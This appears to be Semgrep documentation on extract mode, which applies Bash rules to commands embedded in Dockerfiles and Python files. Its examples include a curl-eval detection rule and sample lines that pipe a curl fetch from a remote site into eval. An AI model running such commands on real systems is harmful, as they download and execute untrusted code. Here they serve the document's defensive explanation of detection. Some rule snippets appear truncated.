Example of extract mode
Without extract mode, writing rules to validate template, Markdown or configuration files which contain code in another language can be burdensome and require significant rule duplication.
Let's take the following Bash rule as an example (a simplified version of the
curl-eval rule from the Semgrep Registry):
- id: curl-eval
message: Evaluating data from a `curl` command is unsafe.
- pattern: |
- pattern: |
- pattern: eval ...
Usually, Semgrep uses this rule only against Bash files. However, a project might contain Dockerfiles or Python scripts that invoke Bash commands—without an extract mode rule, Semgrep does not run any Bash rules against commands contained in files of different languages.
However, with extract mode, you can provide Semgrep with instructions on how to extract any Bash commands used in a Docker
RUN instruction or as an argument to Python's
os.system standard library function.
- id: extract-docker-run-to-bash
pattern: RUN $...CMD
- id: extract-python-os-system-to-bash
By adding the extract mode rules as shown in the previous code snippet, Semgrep matches Bash code contained in the following Python file and reports the contained Bash as matching against the
from os import system
if system('eval `curl -s "http://www.very-secure-website.net"`'):
Likewise, if a query included a Dockerfile with an equivalent Bash command, Semgrep reports the contained Bash as matching against the
curl-eval rule. See the following Dockerfile example that contains a Bash command:
RUN dnf install -y unzip zip curl which
RUN eval `curl -s "http://www.very-secure-website.net"`
Extract mode rule schema
Extract mode rules require the following usual Semgrep rule keys:
- One of
Extract mode rules also require two additional fields:
Extract mode has one optional field:
The fields specific to extract mode are further explained in the sections below.
extract key is required in extract mode. The value must be a metavariable appearing in your pattern(s). Semgrep uses the code bound to the metavariable for subsequent queries of non-extract mode rules targeting
dest-language key is required in extract mode. The value must be a language tag.
reduce key is optional in extract mode. The value of this key specifies a method to combine the ranges extracted by a single rule within a file.
The value of
reduce key must be one of the following:
Treat all matched ranges as separate units for subsequent queries. This is the default value.
Concatenate all matched ranges together and treat this result as a single unit for subsequent queries.
Limitations of extract mode
Currently, extract mode does not support additional processing for the extracted text, such as unescaping strings, which might be useful for some applications like Jupyter Notebooks.
While extract mode can help to enable rules which try and track taint across a language boundary within a file, taint rules cannot have a source and sink split across the original file and extracted text.